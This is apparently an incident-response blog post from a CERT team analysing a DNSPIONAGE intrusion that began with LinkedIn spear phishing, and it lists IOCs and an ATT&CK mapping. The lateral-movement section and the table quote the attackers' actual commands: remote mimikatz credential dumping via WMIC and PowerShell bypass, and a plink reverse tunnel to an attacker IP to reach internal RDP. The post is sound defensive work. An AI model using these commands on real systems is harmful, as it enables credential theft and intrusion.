[DNSPIONAGE] – Focus on internal actions

[

Introduction

Recently, we had an incident response involving the malware DNSPIONAGE.

At CERT-OPMD, we thought it would be interesting to share our observations.

Mainly, we could observe quietly common actions and tools as described in infography below.

How DNSPIONAGE infects targets

In this blogpost, we will not describe and analyse again the dropper, because Talos did a great job here : https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html

But we will focus in a way on what they could not have seen with their telemetry, and what we could have seen during our investigation.

The screenshot above is what we are talking about here.

Talos observed two domains during the analysis :

  • hr-suncor[.]com
  • hr-wipro[.]com

And they did obtained the “Suncor” dropper.

During investigation we were targeted by Wipro document (cf. screenshot below):

Some Google reverted search on image, shows us where the attackers get this image below (spoiler: on legit wipro.com website, see screenshot below).

Ok, so now we are aware that they wanted to do some really advanced spear phishing.

During our investigation, we had the chance to speak with very comprehensive users, who remembered weird things that happened to them.

He remembered he was speaking with a HR from Wipro on linkedin for few days before the attack.

We hid the identity of the linkedin account because we are assuming it’s a real person behind it, whom may have it’s account stolen. 

 

“Hopefully”, the users infected were technical IT guys, so it was easy to be understood by them while talking about “phishing”, “spear phishing via social media”, etc.

We hope these datas will help you to understand how DNSPIONAGE infects people

Tools used by DNSPIONAGE to perform internal actions

Internal actions observed

Now, we will describe the lateral movement we observed during the Incident Response.

We observed some very “usual” phases in this case : a preparation phase to perform the whole attack (domain registration, and so on), a delivery phase (with social engineering through professional social media), an installation and a C&C phase (where the malware is dropped, and the macro used for dropping creates a scheduled task).

Then we observed the adversaries performing directory listing through batch files:

  • dir /s /a C:\ 2>&1    (from C: to Z:)

These results were exfiltrated through HTTP to the C&C, to perform some analysis. Because the actions we observed next are file copying and specific files exfiltrations, like a file containing the backup’s configuration. We assumed it was used then to map the network “passively”.

After having the hostnames informations, adversaries performed some discovery using microsoft tools, including network discovery, software discovery, shares discovery,etc. :

  • wmic logicaldisk get name
  • net group \ »domain admins\ » /domain
  • ping -n 1 -a IP
  • net use \\\\HOSTNAME\\c$ /user:\ »DOMAIN\\USERNAME\ » \ »PASSWORD\ » 2>&1
  • WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter Path AntiVirusProduct Get /Format:List | more | findstr displayName 2>&1
  • wmic /node:\ »HOSTNAME\ » process call create \« cmd /c powershell -exec bypass import-module c:\\users\\public\\new.ps1;invoke-mimikatz

With all the informations gathered, adversaries could perform some precise lateral movement on critical servers, by installing a putty to make a SSH tunnel in order to perform RDP remotely.

  • echo y | .\\downloads\\plink32.exe 185.236.78.63 -P 443 -C -R 0.0.0.0:12456:HOSTNAME:3389 -l <login> -pw <password>

The schema below is here for helping understand  DNSPIONAGE’s process in network.

Tool listing
  • Mimikatz : Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks.
  • Off-the-shelf administration software
  • Bitvise WinSSHD : Bitvise WinSSH is an easy-to-use SSH server which includes Secure remote access via console (vt100, xterm and bvterm supported), Secure remote access via GUI (Remote Desktop or WinVNC required).
  • Open source Hacking tools : (https://github.com/Veil-Framework/Veil-Pillage/blob/master/data/PowerSploit/Invoke-Mimikatz.ps1)
  • Custom malware : DNSPIONAGE
  • Putty : to open SSH tunnel in order to gain RDP access on internal assets
ATT&CK Matrix mapping

In order to understand the entire behavior of the attackers, from the initial access to data exfiltration, we created a matrix to reconstruct the entire TTP of the attackers.

We based our matrix on Mitres’s work ; MITRE ATT&CK™ is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. So we cut out all the phases of the actions taken by the attackers, so any analysts or researchers could understand and remedy this situation if they came to meet her.

MITRE ATT&CK phases Technics IOC Comments Observations
Initial Access
Spearphishing via Service
(T1194)
https://fr[.]linkedin[.]com/in/XXXXXXXXXX HR consultant spoke with targets for weeks thourgh linkedin before delivering spearphishing link
Spearphishing Link
(T1192)
http://hr-wipro[.]com/Wipro_Working_Conditions.doc
Execution
Windows Management Instrumentation
(T1047)
wmic /node:\ »USER\ » /user:\ »DOMAIN\\USERNAME\ » /password:PASSWORD process call create \ »cmd /c echoy y | .\\Downloads\\plink32.exe 185.236.78.63 -P 443 -C -R 0.0.0.0:12456:HOSTNAME:3389 -l <login>-pw <password>\ » Command Failed but was used three times
Scripting
(T1064)
Downloads\\bat_file_46583.bat Using custom batch files to script actions (script directory listing, script copy of ps1 tools to many other assets) Example next case C:\\Users\\USERNAME\\.oracleServices>CHCP 65001 \r\n\r\nC:\\Users\\USERNAME\\.oracleServices>copy .\\Downloads\\new.ps1 \\\\HOSTNAME\\c$\\users\\public\\ 2>&1 \r\n 1 file(s) copied.\r\n\r\nC:\\Users\\USERNAME\\.oracleServices>copy .\\Downloads\\new.ps1 \\\\HOSTNAME\\c$\\users\\public\\ 2>&1 \r\n 1 file(s)
Command-Line Interface
(T1059)
wmic /node:\ »HOSTNAME\ » process call create \ »cmd /c powershell -exec bypass import-module c:\\users\\public\\new.ps1;invoke-mimikatz Using cmd to call powershell with « -exec bypass » args
PowerShell
(T1086)
wmic /node:\ »HOSTNAME\ » process call create \ »cmd /c powershell -exec bypass import-module c:\\users\\public\\new.ps1;invoke-mimikatz Using powershell with « -exec bypass » args to launch mimikatz
Persistance Scheduled Task
(T1053)
Set service = CreateObject (schedule.service)
regInfo.Description = « chromium updater v 37.5.0 »
regInfo.Author = « Google Inc. »
Observed in dropper’s macro
Defense Evasion File Deletion
(T1107)
del .\\Downloads\\bat_file_46583.bat After using a custom .bat downloaded from C2, attackers deleted it immediately
Credential Access Credential Dumping
(T1003)
sekurlsa::logonpasswords Includes Script from https://github.com/Veil-Framework/Veil-Pillage/blob/master/data/PowerSploit/Invoke-Mimikatz.ps1 Mimikatz Version : mimikatz 2.0 alpha (x64) release \ »Kiwi en C\ » (Feb 16 2015 22:15:28)
Discovery
System Information Discovery (T1082) echo %username%, i : -4000, t : -1, k : 0 | hostname i : -5000, t : -1, k : 0 | systeminfo | findstr /B /C:\ »Domain\ » i : -6000, t : -1, k : 0 Get detailed information about the the operating system
Permission Groups Discovery
(T1069)
net group \ »domain admins\ » /domain
Query Registry
(T1012)
reg query \ »HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\ Get Remote Connection details from user
File and Directory Discovery
(T1083)
dir /s /a C:\ 2>&1
dir \\\\HOSTNAME\\c$ 2>&1
Use batchs scripts to perform directory discovery locally or remotely
Windows Admin Shares
(T1077)
net use \\\\HOSTNAME\\c$ /user:\ »DOMAIN\\USERNAME\ » \ »PASSWORD\ » 2>&1 Try to remotely access to networked system
Remote System Discovery
(T1018)
ping -n 1 -a IP Try to know if IP is up
Security Software Discovery
(T1063)
WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter Path AntiVirusProduct Get /Format:List | more | findstr displayName 2>&1 Adversaries attempt to get a listing of security softwares
System Network Configuration Discovery
(T1016)
ipconfig /all Get detailed of network configuration from host
System Information Discovery
(T1082)
wmic logicaldisk get name List all logical and physical drives
Lateral Movement
Remote Desktop Protocol
(T1076)
echo y | .\\downloads\\plink32.exe 185.236.78.63 -P 443 -C -R 0.0.0.0:12456:HOSTNAME:3389 -l <login> -pw <password> Using plink32 to open an SSH tunnel to perform remote RDP
Remote File Copy
(T1105)
copy .\\Downloads\\new.ps1 \\\\HOSTNAME\\c$\\users\\public\\ 2>&1 Using remote copy to push files used for lateral movement,like new.ps1 (mimikatz)
Collection Data from Local System
(T1005)
« ull »: « /Client/Upload »,
« dl »: [],
« ul »: [« d:\\mRemoteNG-IMFO\\confCons.xml »]
Exfiltration Exfiltration Over Command and Control Channel
(T1041)
« ull »: « /Client/Upload »,
[Message] uploading files form
.\bat_file_17757_res.txt
In log.txt we can observe the json orders, including the « Upload » orders and Upload URL
Command and control
Commonly Used Port
(T1043)
Port 80 HTTP for C2
Port 443 for SSH Tunnel
Standard Application Layer Protocol
(T1071)
HTTP
DNS
Data Encoding
(T1132)
[Message] send command result dns length:63
[Message] hSfAGJRFIAJHGGWU6S[…]0.0ffice36o.com
[Message] umCGGJRFI[…]0.0ffice36o.com
[Message] 6L6yGJRFIA2[…]0.0ffice36o.com
Base32 to encode DNS messages
Multiband Communication
(T1026)
[Message] config file found!
[Message] current directory set to C:\Users\USERNAME\.oracleServices\
[Message] entering normal mode[Message] get command with dns
Malware can change mode into HTTP mode or DNS mode to exfiltrate datas
Remote File Copy
(T1105)
« dl »: [« /Client/Download/LXqaYRoxoPYNOwjfDadLJAExtjgZYBunvJFwoEohVXJvK »], Malware downloaded batchs scripts or ps1 scripts to perform actions.

Infrastructure in use during investigation

Global overview – DNS & IP publicly observable

During the investigation we were able to trace a number of IP addresses used by the attackers. We find both the IP that hosted the C2, the IP that served for the RDP connection, and so on :

 

IPs Use
185.236.78.63 Used for RDP
185.161.211.72 *.0ffice36o[.]com
107.161.23.204 *.0ffice36o[.]com
192.161.187.200 *.0ffice36o[.]com
209.141.38.71 *.0ffice36o[.]com
185.20.184.138 HTTP Server for C2

 

By performing some passive DNS resolution from hr-wipro[.]com (the dropper delivery domain) and hr-suncor[.]com (observed by Talos) we could observe the following domains/IP :

 

hr-wipro[.]com hr-suncor[.]com
209.141.38.71 185.161.211.79
107.161.23.204 185.174.101.168
192.161.187.200
185.174.101.168
185.161.211.79

Infrastructures used for lateral movement

After compromising the first victim, the main goal of the attackers is to perform some lateral movement in order to have better access to more sensitive datas and/or assets :

  • They first tried to use mimikatz remotely on several servers (which triggered our SOC alert). “Hopefully” it seems they only used sekurlsa::logonpassword and they did not create some golden or silver tickets.
  • Mimikatz was not really efficient, but they could already execute some arbitrary code remotely.
    • So they decided to copy plink32.exe – a putty like – on several assets. (sha256sum:3984ae8dd6df1196211232eb56393a4ce3a330508c5862c38ea3b8faf8048072)
    • Execute plink32.exe to create a tunnel in order to perform remote RDP on assets. (echo y | .\\downloads\\plink32.exe 185.236.78.63 -P 443 -C -R 0.0.0.0:12456:HOSTNAME:3389 -l <login> -pw <password>)
    • By using RDP, it was easier for them to access to databases servers and to identify other critical asset

Conclusion

We were very lucky during the investigation : the attackers performed a lot of errors that helped us to investigate easily, and to give us some very precise indicators on how they perform the requests.

So, we  hope this article will help you investigating internally if you  may have been targeted by DNSPIONAGE.

IOC

CSV format

value,type
*.0ffice36o.com|185.161.211.72,domain|ip
*.0ffice36o.com|107.161.23.204,domain|ip
*.0ffice36o.com|192.161.187.200,domain|ip
*.0ffice36o.com|209.141.38.71,domain|ip
hr-wipro.com|209.141.38.71,domain|ip
hr-wipro.com|107.161.23.204,domain|ip
hr-wipro.com|192.161.187.200,domain|ip
hr-wipro.com|185.174.101.168,domain|ip
hr-wipro.com|185.161.211.79,domain|ip
hr-suncor.com|185.161.211.79,domain|ip
hr-suncor.com|185.174.101.168,domain|ip
185.236.78.63,ip-dst
185.20.184.138,ip-dst